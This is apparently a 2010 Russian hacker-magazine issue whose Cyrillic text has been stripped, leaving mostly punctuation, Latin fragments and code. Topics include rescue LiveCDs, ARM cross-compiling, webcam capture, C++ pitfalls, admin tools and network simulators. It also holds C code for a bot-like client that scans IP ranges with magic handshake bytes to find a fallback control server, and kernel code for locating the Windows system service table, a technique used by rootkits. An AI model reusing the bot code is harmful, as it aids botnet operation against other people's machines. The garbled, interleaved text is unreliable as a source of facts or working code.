devbuilds.kaspersky-labs.com/devbuilds/RescueDisk10. LiveCD . ,
Gentoo 2.6.31, .
GUI ( kav 2010)
.
AVG LiveCD. , , , ,
( ). LiveCD,
.
, ,
FAT NTFS, . (
arl ),
.
(Windows Registry Editor).
, . , ViAvRe (Virtual Antivirus Rechecker),
: Avg, Avast, Doctor
Web (CureIt), McAfee, BitDefender, F-Prot.
, .
(04.10, ) OpenSuse 11.2
SuSeStudio.
viavre-update,
. LiveCD
: full KDE ( 768 ) light LXDE (
mcafee, avg, firefox, virtualbox k3b;
256 ).

WARNING
warning
,
LiveCD
.

,

.

DVD
dvd


LiveCD.
,
:).

, Linux, .
, , Panda DesktopSecure for Linux
Avira. ,
- .z


UNIXOID
diver@edu.ioffe.ru, ICQ 308229460

FriendlyArm Android

:

-x86
- Linux

.
Intel' x86.

, ,
. ,
embedded ( ) - GNU/Linux
, , - Windows.
,
.
,


:
- . ,
, - -

.

:
. ,

Linux-

,
. GNU/Linux
,
Make-.
, ,
.
, - .
Make- ,
Unix-.

Linux-box'.

Linux, ( bare metal), , .
.

,

, ,

embedded-! , !
,
- -- ,
. ,
, ? , , -
! ,
,
.
GUI-
.
,
Wine,
(: USB-
Silabs C8051: http://ec2drv.sourceforge.net). ,
Windows-, GNU- .


,
embedded-?


,
.
,
, ( IDE Integrated Desktop Environment).
, ,
. .
Code::Blocks (www.codeblocks.org).
, . , ,
make-
IDE.
, ,
. ,
2008 , ,
svn.
Eclipse (www.eclipse.org). , Java, ,
.
,
. Vim/Emacs.

. . , -

.
gedit, kate.
.
, .

HTTP://WWW
links

http://wiki.starterkit.
ru/cross_compiler

crosstoolng.
http://wiki.openembedded.net



.

INFO

info
JTAG


.

,

.

,
. .
GNU GCC. , , GCC,
Linux-. , ,
, , .



.
U-boot. ,
USB
(Xmodem).
,
.
,
, JTAG. : ,
.

, ,
. SDCC Small Devices
C Compiler.
Intel MCS51, AVR, HC08, PIC Z80.
8051 Keil.
. Keil, .
Wine . , .
. ,
.
,
.

, - , ,
ARM-. GCC :
arm-linux arm-gcc. , ,
Linux,
. ,
.
, ,
, Linux ,
.
, , . , Linux
.
,
. :
$ vi hello.c
#include <stdio.h>
int main(void) {
    printf("Hello world!\n");
    return 0;
}

:
$ arm-linux-gcc -o hello hello.c
$ file hello
hello: ELF 32-bit LSB executable, ARM, version 1,
statically linked, not stripped

, ,
, .
Make-,
make. :
$ CC=arm-linux-gcc make

configure, , , :



$ CC=arm-linux-gnu-cc ./configure --host=arm

,
? PC
PC-, - !
, . , . -
, apt-get install libncurses5-dev
. ,
,
.
Debian, , - . , ,
,
.
,
, , . , embedded-
uclibc
glibc. ,
, . ,
Dependency Hell,
,
-.
, - ,
,
.
, ,
? ,
.
, ,
,
, , ,
. ,
,
, , :
$ ls
startup.S main.c sdram.lds
$ arm-elf-gcc -Os -march=armv4t -c \
    -o startup.o startup.S
$ arm-elf-gcc -Os -march=armv4t -c -o main.o main.c
$ arm-elf-gcc -T"sdram.lds" -s -Os -march=armv4t \
    -nostartfiles -nostdlib -o firmware.elf startup.o main.o
$ arm-elf-objcopy --strip-debug --strip-unneeded \
    firmware.elf -O binary firmware.bin

- Linux-
FriendlyARM (http://friendlyarm.net).
, Mini2440, Samsung
s3c2440 LCD-. , 150 .

, , .
,
, . "-Os"
,
"-march=armv4t"
ARMv4. ,
,
.
. "-Tsdram.lds". lds
. , , , ,
. ,
x86-, gcc -
. . , ,
lds, .

,
,


. , ,
, ,
ELF ( PE ), .
ELF-,
, ! ELF-
, .
,
. , ,
.

,
. -
. , .
. , jffs2-
Ethernet/
Xmodem/SD-card/-.
.
, ?
. ,
- (, JTAG I2C).
. ,
.


ARM-
Openocd (http://openocd.berlios.de) ,
ARM MIPS- JTAG.
. Must have.
, C2 JTAG- SiLabs
linux- http://wiki.
enneenne.com/index.php/Silicon_C2_Interface
Ec2drv (http://ec2drv.sourceforge.net).
Eep24c
I2- EEPROM.
LPT-. avrdude/
avrprog/uisp/dfu-programmer Atmel AVR.
, .
,
- .
Windows-
, .
.


gcc- ,
. ,
.
Emdebian (emdebian.org), .
Debian, , ,
. Ubuntu (, !)
-x86 , ,
.

/,
crosstool-ng (http://ymorin.is-a-geek.org/
projects/crosstool). ,
, .
,
-.

__EXIT()
, . ,
, . ,
, embedded-..z


CODING
stannic.man@gmail.com


WINDOWS

,
Windows, ,
.
, , .
, ,
, ,
.
.
,

Rustocka TDSS,
. , , ,

.

, - .
, , ,
, (
, ).
. :
,
, , ,
.
, - - .
- ! ,
,

. , .

, kernel-based -
, ,
. ,
,
?
, Windows, /, , , ,
, , KeServiceDescriptorTable/


KeServiceDescriptorTableShadow,
.

KESERVICEDESCRIPTORTABLE

, . ,
,
KeServiceDescriptorTable
, ,
NtCreateFile, NtCreateProcess, NtCreateThread ..
, ,
( , ,
). , ,
- ,
KeServiceDescriptorTable -, .
(F-Secure, , NtLoadDriver)
( COMODO Internet Security Outpost).
, , . , Kaspersky AV (?) SSDT,

. KeServiceDescriptorTable
KeServiceDescriptorTableShadow.
win32k.sys, , ,
, Windows.
Win32k.sys : NtUser* NtGdi*,
, .
, Win32k
: ,
KeServiceDescriptorTableShadow NtUserFindWindowEx,
NtUserQueryWindow, NtUserGetForegroundWindow
windows-.
KeServiceDescriptorTable.
, : extern PVOID KeServiceDescriptorTable.
KeServiceDescriptorTableShadow , , .

DVD
dvd

KeServiceDescriptorTable
, ? ?
SSDT ,
. ,
, . ZwOpenFile/ZwCreateSection/ZwMapViewOfSection

ntoskernl.exe (ntkrnlpa.exe
).
KeServiceDescriptorTable,
.
KiServiceTable
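/* Fixup entry of a base relocation block (not declared in the Windows headers) */
typedef struct {
    USHORT offset : 12;
    USHORT type   : 4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

ULONG FindKiServiceTable(
    ULONG SdtPtr,
    ULONG Handle)
{
    ULONG bFirst = 1, RvaPtr, i;
    char *pointer;
    PIMAGE_BASE_RELOCATION reloc;
    PIMAGE_FIXUP_ENTRY fixup;

    pointer = (char *)Handle;
    pointer += 0x3c;  /* IMAGE_DOS_HEADER.e_lfanew */
    /* 0xA0 from the NT headers: the base relocation data directory entry */
    pointer = (char *)(*(ULONG *)pointer) + Handle + 0xA0;
    reloc = (PIMAGE_BASE_RELOCATION)((char *)(*(ULONG *)pointer) + Handle);
    /* bFirst lets the loop enter even if the first block has VirtualAddress == 0 */
    while ((bFirst) || (reloc->VirtualAddress))
    {
        bFirst = 0;
        fixup = (PIMAGE_FIXUP_ENTRY)((ULONG)reloc + 8);
        for (i = 0; i < (reloc->SizeOfBlock - 8) >> 1; i++, fixup++)
            if (fixup->type == 3)  /* IMAGE_REL_BASED_HIGHLOW */
            {
                RvaPtr = reloc->VirtualAddress + fixup->offset;
                /* 0x400000 is the image base this code assumes */
                if (*(PULONG)(Handle + RvaPtr) - 0x400000 == SdtPtr)
                {
                    /* 0x05c7 = bytes C7 05: mov dword ptr [mem32], imm32 */
                    if (*(PUSHORT)(Handle + RvaPtr - 2) == 0x05c7)
                        return (*(PULONG)(Handle + RvaPtr + 4) - 0x400000 + Handle);
                }
            }
        *(PULONG)&reloc += reloc->SizeOfBlock;
    }
    return 0;
}

WRK Windows
Research Kernel,

Windows.

Windows :).

HTTP://WWW
links

,


wasm.ru
http://rsdn.ru/
forum/asm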

, ,
, SSDT , ,
.
,
NtCreateSection NtMapViewOfSection,
. , .
, SSDT ShadowSSDT,
.

POSITION NUMBER TWO

,
.
KeServiceDescriptorTable
KeServiceDescriptorTableShadow,
KTHREAD. ,


KeServiceDescriptorTableShadow
, KeServiceDescriptorTable.
KeServiceDescriptorTable
, KTHREAD.ServiceDescriptorTable

KeServiceDescriptorTable. !
.
? ETHREAD,
KTHREAD ( ),
PsLookupThreadByThreadId (
PsLookupProcessThreadByCid), , :
__asm push esi;
__asm mov esi, fs:[0x124]

esi
ETHREAD. , , .

POSITION NUMBER

:
( , :)). , ,
Windows. ,
PTE ,


NtWriteVirtualMemory. ? ,
?
, KeServiceDescriptorTable
, ,
, PTE.
:
. :
ULONG_PTR GetPhysicalAddress(
IN ULONG_PTR VirtualAddress)
{
return (VirtualAddress & 0x1FFFFFFF);
}


? .
Windows . CreateFile/
ReadFile/WriteFile. ,
Windows . , , ,
,
. , .
. NT),
.
:
WRK (Windows Research Kernel), ,
,
.
, , , SFC,
, , ,
. . ? , . ,
Windows - Linux
,
.
WRK .
, , ,
.

PRO & CONS

, . ,
,
. , ,
.
,
. , , :). proof of concept.
, ! z

>> coding
RankoR ax-soft.ru




][
, , ,
.
,
.

][,
QTss-Brute . ,
: RDP,
:). !

,
. ? -
, , .
, xxx.xxx.0.0-xxx.xxx.255.255
10-100 . ,
.
, . , ,
. IP .
, , (!)
. , , ,
. :
, .
, , , :).

, IP
,
.
,
, , .
, ?
. , , .

, . MS Visual Studio 2008


C ( C, C++!),
Intel. ? 2010
(MSI Wind u90) , , , . , Intel
, - , ,
Microsoft .
, .
Win32 Console Application ( ,



IRC-

DVD
dvd

(
)

WARNING
warning


.
,
,
,

,
,
.

Win32 Application).
TCP/IP,
winsock2.
( ,
),
.
:

getServer();
getRange();
while ( true )
{
sock = tcp_connect(srv, PORT);
if ( sock > 0 ) {
/*..SOME MAGIC..*/
} else { // Server is dead!!!!111
range = getRange();
server = findServer((char*) range);
if ( server == NULL )
continue;
memcpy(srv, server, 20);
}
Sleep(1000);
}

findServer()
char *findServer(
const char *fIP
)
{
Range range;
char *server;
memcpy(range.startIP, fIP, 3);
memcpy(range.endIP, fIP, 3);
range.startIP[3] = 0;
range.endIP[3] = 255;
server = scanRoutine(&range);
if ( server )
return server;
range.startIP[2] = 0;
range.endIP[2] = 255;
server = scanRoutine(&range);
if ( server )
return server;

(, , ?)
.
- ,

.

range.startIP[1] = 0;
range.endIP[1] = 255;
server = scanRoutine(&range);

return server;
// Returning pointer anyway (NULL too)

metal, DieHard, YaesU, DjFly, Miracle,



}


scanRoutine()
char *scanRoutine(
const Range *range)
{
unsigned int a, b, c, d;
char *server, data[8];
SOCKET sock;
server = (char*) malloc(20);
d = range->startIP[3];
c = range->startIP[2];
b = range->startIP[1];
a = range->startIP[0];

while ( true )
{
if ( d > 255 )
d = 0, c++;
if ( c > range->endIP[2] &&
b == range->endIP[1] )
break;
if ( c > 255 )
c = 0, b++;
if ( b > range->endIP[1] &&
a == range->endIP[0] )
break;
if ( b > 255 )
b = 0, a++;


getRange() IP (
, , , ) ,
. getServer() , .
findServer()
(. ). , IP 192.168.1.1.
192.168.0.0-192.168.255.255.
192.0.0.0-192.255.255.255,
0.0.0.0-255.255.255.255.
( ) .
range:

sprintf(server, "%u.%u.%u.%u", a, b, c, d);


sock = tcp_connect(server, PORT);

typedef struct
{
unsigned char startIP[4], endIP[4];
} Range;

if ( sock > 0 )
{
// OK, port is open, now check it!
if ( tcp_send(sock, cliHello, 8) < 0 )
continue;

IP
( , unsigned char).
, . , ,
.
cliHello srvHello:

tcp_recv(sock, data, 8);


if ( memcmp(data, srvHello, 8) )
continue;
closesocket(sock);
return server;
// Thats ok!!!

const char cliHello[] = "\xD\xE\xA\xD\xB\xE\xE\xF";


const char srvHello[] = "\xF\xE\xE\xB\xD\xA\xE\xD";

, cliHello, srvHello. ,
, srvHello ,
.
.
IP . cliRange
:
const char cliRange[] = "\xA\xB\xC\xD";

, .
, !

}
d++;
}
free(server);
return NULL;
}

. , .exe
12.5 , C C.
. ,
( ..) :). , .
, . , ,
. ! z


CODING
http://vr-online.ru

-

-
, .
,
. . ,
-
, .
:

, ,
.NET Framework
-. ( SilverLight- ), , VS2010 4- .NETa.
, .
,
MSDN DirectDraw. , - DirectDraw
.
, .
,
. ,
. ( ).
DirectDraw,
. .
, .
DirectDraw, .
- ,
VFW (Video For Windows). , (
) . , -


-.
,
. , ,
, . , win-
WinAPI . - -
-
Delphi. .
, .

, 1

, /
-. .
.
.
. .
, .
, ,
,
.
WindowsAPI capGetDriverDescription(). :
1. wDriverIndex .
0 9;
2. lpszName , ;
3. cbName ( ) lpszName;
4. lpszVer ,
;
5. cbVer ( ),
.
TRUE.
, , C#. :
// requires: using System.Runtime.InteropServices;
[DllImport("avicap32.dll")]
protected static extern bool capGetDriverDescriptionA(
    short wDriverIndex,
    [MarshalAs(UnmanagedType.VBByRefStr)]
    ref String lpszName,
    int cbName,
    [MarshalAs(UnmanagedType.VBByRefStr)]
    ref String lpszVer,
    int cbVer);

, , , DLL, .
avicap32.dll. , ,
, .

, :
// devices is assumed to be an ArrayList field of the enclosing class
public static Device[] GetAllCapturesDevices()
{
    String dName = "".PadRight(100);
    String dVersion = "".PadRight(100);
    for (short i = 0; i < 10; i++)
    {
        if (capGetDriverDescriptionA(i,
            ref dName, 100,
            ref dVersion, 100))
        {
            Device d = new Device(i);
            d.Name = dName.Trim();
            d.Version = dVersion.Trim();
            devices.Add(d);
        }
    }
    return (Device[])devices.ToArray(
        typeof(Device));
}

WinAPI .NET

,
!

.
,
capGetDriverDescription.
MSDN , (
capGetDriverDescription()) 0 9,
.
Device
( ,
).
,
.
capCreateCaptureWindow(),
.
, ,

. , , windows- (
) SendMessage().

capCreateCaptureWindow().
:
1. lpszWindowName - , ;
2. dwStyle ;
3. x X;
3. y Y;
4. nWidth ;
5. nHeight ;
6. hWnd handle ;
7. nID .
handle
NULL .
WinAPI,
- . , ,
capGetDriverDescription().
:

HTTP://WWW
links
blogs.msdn.com

Silverlight
4 real-time Face
Detection (

SilverLight).
facelight.codeplex.
com
Facelight,
.



,


.
www.aforgenet.
com/framework
AForge
.NET

, ..
vr-online.ru
,


VROnline.


!
!
deviceHandle = capCreateCaptureWindowA(
ref deviceIndex, WS_VISIBLE | WS_CHILD, 0, 0,
windowWidth, windowHeight, handle, 0);
if (SendMessage(deviceHandle,
WM_CAP_DRIVER_CONNECT, this.index, 0) > 0)
{
SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEWRATE,
0x42, 0);
SendMessage(deviceHandle, WM_CAP_SET_PREVIEW, -1, 0);
SetWindowPos(deviceHandle, 1, 0, 0,
windowWidth, windowHeight, 6);
}


WM_CAP_DRIVER_CONNECT.
.
,
: WM_CAP_SET_
SCALE, WM_CAP_SET_PREVIEWRATE, WM_CAP_SET_PREVIEW. ,
, C#
. .

.
- . ,

. ,
.
(, ) :
GetAllDevices ( ), GetDevice (
), ShowWindow (
-), GetFrame (
) GetCapture ( ).

( ). ComboBox (
)
, , . ,
Image.
. .
. :


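// Base value of the capture window messages (WM_USER)
private const int WM_CAP = 0x400;
// Connect the capture window to a capture driver
private const int WM_CAP_DRIVER_CONNECT = 0x40a;
// Disconnect the capture window from the driver
private const int WM_CAP_DRIVER_DISCONNECT = 0x40b;
// Copy the current frame to the clipboard
private const int WM_CAP_EDIT_COPY = 0x41e;
// Enable or disable preview mode
private const int WM_CAP_SET_PREVIEW = 0x432;
// Enable or disable overlay mode
private const int WM_CAP_SET_OVERLAY = 0x433;
// Set the previewrate (frame display interval)
private const int WM_CAP_SET_PREVIEWRATE = 0x434;
// Enable or disable scaling of the preview image
private const int WM_CAP_SET_SCALE = 0x435;
// Window styles used for the capture window
private const int WS_CHILD = 0x40000000;
private const int WS_VISIBLE = 0x10000000;
// Set the callback function for preview frames
private const int WM_CAP_SET_CALLBACK_FRAME = 0x405;
// Grab a single frame from the capture driver
private const int WM_CAP_GRAB_FRAME = 0x43c;
// Save the current frame to a DIB file
private const int WM_CAP_SAVEDIB = 0x419;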

Device[] devices = DeviceManager.GetAllDevices();
foreach (Device d in devices)
{
    cmbDevices.Items.Add(d);
}

, ?
.
:
Device selectedDevice =
DeviceManager.GetDevice(cmbDevices.SelectedIndex);
selectedDevice.ShowWindow(this.picCapture);

, .
:
Device selectedDevice =
DeviceManager.GetDevice(cmbDevices.SelectedIndex);
selectedDevice.FrameGrabber();

FrameGrabber().

. , ,
.

, ,
.
: .
() ,


.
,
.NET AForge.NET. AForge.NET
.

: ,
( , ,
, , ), , , ..
. . .
. .
. ,
.
WinAPI ? .
, . ,
. - .NET,
- WinAPI.
. MotionDetector . Bitmap
. :
MotionDetector detector = new MotionDetector(
    new TwoFramesDifferenceDetector( ),
    new MotionAreaHighlighting( ) );
// Process the next frame and compare the motion level with the alarm threshold
if ( detector != null )
{
    float motionLevel = detector.ProcessFrame( image );
    if ( motionLevel > motionAlarmLevel )
    {
        flash = (int)
            ( 2 * ( 1000 / alarmTimer.Interval ) );
    }
    if ( detector.MotionProcessingAlgorithm is
        BlobCountingObjectsProcessing )
    {
        BlobCountingObjectsProcessing countingDetector =
            (BlobCountingObjectsProcessing)
            detector.MotionProcessingAlgorithm;
        objectsCountLabel.Text = "Objects: " +
            countingDetector.ObjectsCount.ToString( );
    }
    else
    {
        objectsCountLabel.Text = "";
    }
}

(
MotionDetector)
-. ,
( ProcessFrame): motionlevel
motionLevelAlarm (0.015f), , ! .
.

-
- ? , ! http://
codeplex.com ( OpenSource MS)
( ),
-.
.NET
SilverLight.
, .
( , , , ..) SilverLight .
.


.
-
, . Skype-. ,
. . ,
- ,
, ,

:). . z


CODING
deeonis deeonis@gmail.com

C++

C++! C
,
, ,
.
.
C++ ,
- .
, .

,
. ,
, .
,
, :

class Shape {
public:
enum ShapeColor { Red, Green, Blue };
virtual void draw(ShapeColor color = Red) const = 0;

};
class Rectangle: public Shape {
public:
virtual void draw(ShapeColor color = Green) const;

};
class Circle: public Shape {
public:
virtual void draw(ShapeColor color) const;

};

Shape,
draw.
, Shape Rectangle Circle.


- .
:
Shape
// Shape*
Shape *ps;
// Shape*
Shape *pc = new Circle;
// Shape*
Shape *pr = new Rectangle;

ps, pc pr Shape,
.
,
Shape*.
, , . , pc
Circle*, , Circle,
. ( ).

. ,
,
. ,
,
, .

// Circle::draw(Shape::Red)
pc->draw(Shape::Red);
// Rectangle::draw(Shape::Red)
pr->draw(Shape::Red);
// Rectangle::draw(Shape::Red)!
pr->draw();


pr Rectangle*, ,
, Rectangle.
Rectangle::draw Green.
pr Shape*,
Shape, Rectangle. ps, pc pr
, . , draw ,
.
C++ ?
.
,
,
,
.
.
, , , ,
-,
, ?

class Shape {
public:
enum ShapeColor { Red, Green, Blue };
virtual void draw(ShapeColor color = Red) const = 0;

};
class Rectangle: public Shape {
public:
virtual void draw(ShapeColor color = Red) const;

};

.
, .
Shape,
.

.

.
. , ,
(NVI) ,
, .
,
.

, , . , , B,
D. B
mf. , , void. :
D B
class B {
public:
    void mf();
};
class D: public B {};

, mf .
- ,

.

class D: public B {
public:
// B::mf
void mf();
...
};
D x;
// x
D *pD = &x;
// D::mf
pD->mf();
// x
B *pB = &x;
// B::mf
//
pB->mf();

D, : B
*pB D *pD. mf pD ,

.
pB, mf.
, , B::mf D::mf, . , ,
pB B,
, pB , B, ( )
, B.
,
. mf B
, , .
D::mf, pB pD
D.
, D
mf, B, ,
D , . ,
D mf
D, B,
, .
.


.
( ) C++ , ,
, .
.z


SYN/ACK
grinder grinder@synack.ru




HYENA 8.0

, , . , Microsoft, ,
, . Hyena .
HYENA
,
. Windows
, ,
: Radmin, pcAnywhere, Netop, UltraVNC
. .
, ,
, ,
, . , WinRM, PowerShell
SCCM.
(GPO),
. GPO ,


, .

Hyena
-
,
,
. SystemTools Software
Inc. (systemtools.com)

, -
. , , Hyena , .





. Hyena
WinNT: User Manager,
Server Manager File Manager/Explorer,
,
MMC.
,
. ,

( ),
, , ,
. MMC
, , ,
.
, , ,
.
Hyena
,
.

MS Access Excel.
Enterprise-,
(
,
30 ), Exchange
Server 5.5/2000/2003,
WMI. Hyena

,
Windows NT 2000 .
Win7
Win2k8R2.
x64-, (PSO, Password Settings
Objects), Win2k8
.
8.
RDP VNC
,
. ,

. ,
Remote Control Manager
(STRCM,
systemtools.com/strcm,
freeware).
: Hyena

,
.
, , .
,
30 .

.
, Next . , Hyena.
,

, . Hyena .

, Hyena, . ,
24/7, , Hyena .
.


, ,
(
, , , ).
, ,
.
,
, Enterprise
Windows Network (SMB) Windows.
, ,
,
Hyena . File Add Domain;
.
, Find All Domain,
.

Object Manager Configuration,
. , : File Manage Object View,
Objects, Add Windows
Domain.
, :
, OU, , , URL, ..


, . . ,
,

: , ,
, (
). ,
, .
, , ,
.
.
(
), ,
.
( , ) Printers. ,
, ,
, /
.
:
.
, ,
( NTFS),
.

. Hyena .

, / . DFS (Distributed File
System)
.
( ),
, /, , Hyena. ,
, , . . , ,
.

. Events.


Hyena
Filter Events , ,
, .. -

,
:
WMI Execute Query
WMI Query Template Properties, -

Hyena
:
Remote Control
. RCM-,



(
),
,
.
Windows,

.
Hyena :

Account Policy Audit Policy.
: , ,
, .
,
Audit Properties
.

,
, , , .
Hyena ,
. Perfomance
, ,
, , CPU, ,
.
.
, WMI, ,
. -


WMI
.

. , WMI

(WMI Create
Proccess).
, (, , ,
..),
.
MS Access

.
Settings Reporting,

Access ( Excel) : Tools Generate
Report.

STRCM
, Hyena
. RDP-

mstsc.exe, . VNC, Remote Control Manager (STRCM),

VNC-. , STRCM ,
GNU GPL.

, Hyena. , ini-,

.
: rd.rcm rd_
admin.rcm RDP-,
vnc*.rcm
VNC.
Tools
Settings Remote dialog, ,
Edit,
.
:
#
[General]
# : RDP VNC
SoftwareType=VNC
#
Enabled=1
#
MenuName=TightVNC
#
AutoExecute=0
#
[View]
#
ViewerCommand=vncviewer.exe %computer%
# RDP
# ViewerCommand=mstsc.exe

WARNING

warning


RDP/VNC,
Remote Control
Manager.

INFO

info

WMI-

tool_cmds.dat,
,
.
(),
New Submenu.

,
.
:

( , , ..)
.
, RCM-

. Hyena
, .
".RCM file
configuration directory path", Hyena.


Hyena
Custom Tools.

,

Ctrl-F[1-9].
Tools Settings Tools,

%S% , . "\\",

;
%E% ,
;
%G% , ,
;
%HOSTNAME% NETBIOS DNS-
(
Tools Settings Active Directory Use DNS
computer paths);
%Px% , :
%P1% , %P2% , %P3% ;
%Px:prompt% , ;
%Px:prompt/PWD% , .




][ 03.2010
.
AD
Hyena
RSAT (Remote
Server Administration
Tools)
AdminPak (Microsoft
Administration Tools).

HTTP://WWW
links

systemtools.com

, Hyena ,
. ,

.z


SYN/ACK
grinder grinder@synack.ru


CISCO SYSTEMS JUNIPER NETWORKS
, . , ,
.
PACKET TRACERT
: Cisco Systems Inc.
Web: cisco.com/web/learning/netacad/course_
catalog/PacketTracer.html
: Windows XP/Vista/7, Linux (Ubuntu, Fedora)
:
.
Cisco
,

( /) . ,

, .
,
CCNA
(Cisco Certified Network Associate, Cisco ), .
Cisco
Packet Tracert,
Networking Academy,
. :
.
PT ,

.
,
, Cisco (, ,
..). ,
.
,
Cisco (
). , , -


.
,

.
,
.
Packet Tracert ,

( ,
). ,
.
,
. .
,
.

.
drag'n'drop
, ,
.. , PT
, ,
Wireless
, .
, .
,
.
,
(, ).
Logical Workspace (Ctrl+L).

,
Physical

Workspace (Ctrl+P). PT
: Realtime
Mode (Ctrl+R) Simulations Mode (Ctrl+S).


. Realtime
, Simulations
,
( , , ..) Activity
Wizard
. , ,

Cisco , .

DYNAMIPS
: OpenSource
Web: http://www.ipflow.utc.fr/index.php/
Cisco_7200_Simulator
: Windows 2k/XP/Vista, x32/x64 Linux, Mac
OS X
: GNU GPL
Dynamips 2005
Cisco 7200

. Dynamips
Cisco
3600, 3700 2600.
: CPU (MIPS64 PowerPC),
RAM (DRAM, Packet SRAM, NVRAM),
. .
,


.
, IOS (Internet Operating System)
.

Linux. pcap, Windows WinPCAP.
Ubuntu/Debian :

$ sudo apt-get install dynamips

Dynamips , '--help'.
Cisco 7206VXR NPE-200 256 DRAM.
, '-P' (, "-P 3600"). '-t' (
'-t' ).
IOS Cisco, ,
( ,
). IOS- ,
:
$ unzip -p c7200-g6ik8s-mz.124-2.T1.bin > c7200.image

:
$ dynamips c7200.image

Dynamips ,
, .
Dynagen (dynagen.org),
- Dynamips.
, . , ,
.
$ nano v_router.net
# , Dynamips
[localhost]
#
[[7200]]
# IOS-
image = /home/grinder/images/c7200.image
# , RAM,
npe = npe-400
ram = 160
#
[[Router R1]]
# ,
# Serial1/0 R1 Serial1/0 R2
s1/0 = R2 s1/0
[[Router R2]]
#

, .
. ,

, :
s2/0 = NIO_linux_eth:eth1

dynamips (
, '&'):
$ sudo dynamips -H 7200
Cisco Router Simulation Platform (version 0.2.8-RC2-amd64)
Copyright (c) 2005-2007 Christophe Fillot.
Build date: May 9 2009 18:06:28
ILT: loaded table "mips64j" from cache.
ILT: loaded table "mips64e" from cache.
ILT: loaded table "ppc32j" from cache.
ILT: loaded table "ppc32e" from cache.


Packet
Tracker

Packet Tracker realtime-


=> reload R1

,
.
:

IDLE PC

=> list
Name Type State Server Console
R1 7200 running localhost:7200 2000
R2 7200 running localhost:7200 2001

:
Hypervisor TCP control server started
(port 7200).

Dynagen:

$ telnet localhost 2000

,
Console. ,
Dynagen:

$ dynagen v_router.net

Dynagen
*** Warning: Starting R1 with no idlepc value

idle-pc ,
dynagen idlepc get _:
=> idlepc get R1

,
"*".
, ,
idlepc.
.
Dynamips idlepc
'--idle-pc=',
, Dynagen
:

=> telnet R1

(
, dynamips)

.
help, .
help , . <Tab>.
, , , start,
stop, reload, suspend, resume
/all :

idlepc = 0x6076a394

, .

.

. , Dynamips
, ,
.
idlepc IOS-
.
:


Cisco
help
setup
show config
configure terminal
enable [ ]
hostname Router
ip http server -
ip route 172.1.1.0 255.255.255.0 10.1.1.1 permanent
clear ip route *
show ip route

Cisco ,
.


,
:
=> idlepc save R1 db

idlepc
:
=> idlepc show R1

, .
,
Dynagen
. , gDynagen (gdynagen.sf.net)

Dynamips + Dynagen.
Dynagen confDynagen (code.google.
com/p/confdynagen)
,
Dynagen ,
.

GNS3
: OpenSource
Web: www.gns3.net
: Windows 2k/XP/Vista, *nix, Mac OS X
: GNU GPL
GNS3 (graphical network simulator)
,

WARNING

warning

IOS
idlepc.

GNS3

Network Simulator (isi.edu/nsnam/ns) ,


. nam
(network animator).
Xentaur (xgu.ru/hg/xentaur)
, , Xen.
NetSim (mput.de/projects/code/netsim)
, 3D- .
ProfSIMs (networksims.com), RouterSim
(routersim.com), CertExams.com
(routersimulator.certexams.com) ,
Cisco.

. , ,
Cisco (CCNA, CCNP, CCIP, CCIE) Juniper
Networks (JNCIA, JNCIS, JNCIE). ,
Dynamips, Dynagen Qemu.
Wireshark (wireshark.org).
Cisco IOS, GNS3 olive- JunOS (juniper.net/ru/ru/products-services/nos/
junos) ,
Juniper Networks.
Ethernet, ATM Frame Relay (ASA, PIX).
Dynamips,
.

.
GNS3 Linux. Debian/Ubuntu
:
$ sudo apt-get install gns3

, gpl.code.de.

GNS3
gpl.code.de/oswiki/
GplcodedeApt. Python : Qt, PyQt .
Setup Wizard,
:
Dynamips . IOS-.
. "Nodes
Types" , ,
. , ,
, , .
, , IDLE
PC, .
( , , ). , ,
, (,
..) Edit Symbol Manager.
Topology Summary
, ( ). , , GNS3 ,
.
IOS-
Dynamips, Edit IOS images and
hypervisors. image-, ,
RAM .
,
. IDLE PC
( ).
Dynagen,
.
, ,
Add a link. .
, Dynagui
(dynagui.sf.net),
.
GNS3, 2007 .



, , Cisco
Systems Juniper Networks
.z

INFO

info

Packet
Tracert


.
Packet Tracert
,

. , ,



.

HTTP://WWW
links

Dynagen dynagen.
org

Dynamips Dynagen
blindhog.net
IOS
Cisco
tools.cisco.com/ITDIT/
CFN/Dispatch
GNS3
gpl.code.de/oswiki/
GplcodedeApt

Wireshark
wireshark.org
IOS
: www.opennet.ru/
docs/RUS/cisco_basic


SYN/ACK
grinder grinder@synack.ru, urban.prankster martin@synack.ru


WINDOWS *NIX
- :
Windows- *nix-
, .
, , , .
, Windows *nix- .

,
,
,
,
.
.
,
,
. (single sign-on, SSO),

.


: , - ..
,

(, Active Directory),

.
*nix-, , ,
. Samba
(winbind) Kerberos. AD
,

OpenSource- (, Squid).
Samba-
.
LDAP--


. ,

LDAP-
AD.
OpenSource-,

.
*nix-.
][,
, ,
, Windows-.


UNIX
Microsoft
,
. .
( Win2k3R2)

UNIX (Microsoft Server for NIS, AD Identity
Management for Unix), .
Win2k8
. ,
PowerShell:
PS> Import-Module Servermanager
PS> Add-WindowsFeature ADDS-Identity-Mgmt -restart

Windows ,
.

AD
, MS
,
. ,
NIS (Network Information Service)
, AD, , .

Windows *nix. AD *nix' UID GID.

, NIS


(, ).

SCOM 2007
,
Microsoft. System Center ( SCCM 2007
,
][ 08.2009) System Center Operations
Manager 2007 (OpsMgr 2007, microsoft.com/
systemcenter/en/us/operations-manager.
aspx) , ,
.
IT-, .
OpsMgr 2007
MS, 2008 Cross Platform Extensions
(blogs.msdn.com/SCXplat),

,
Linux x86/x64 ( RedHat, SUSE), HP-UX,
AIX Solaris SPARC/x86. CPE : Web Services for Management (WS_Management),
OpenPegasus SSH. . , SSH
. OpsMgr, *nix-
.
, TechNet (technet.microsoft.com/
en-us/systemcenter/scx/default.aspx).
*nix-
OpsMgr
(Apache, MySQL, syslog),
: , , CPU. OpsMgr
Computer and Device Management Wizard - Unix/Linux Discovery
Wizard , .
scx-cimd
scx-wsmand,
.

.

, Windows. *nix + , , ( ,
).
AD, ,
. , *nix
UID GID
,
. ,
, .
, .
, -.

LIKEWISE OPEN
: LIKEWISE SOFTWARE
WEB: LIKEWISE.COM, LIKEWISEOPEN.ORG
: LINUX 2.4/2.6 (X86/X64) RPM&DEB BASED, FREEBSD X86, SOLARIS 8+
(X86/X64, SPARC), OS X 10.4+, HP-UX PA-RISC/IA64, AIX


.
: Centrify DirectControl/Centrify DirectManage, Likewise
Enterprise/Likewise Open, Quest Authentication Services ( Vintela
Authentication Services) Quest One Identity Solution. *nix
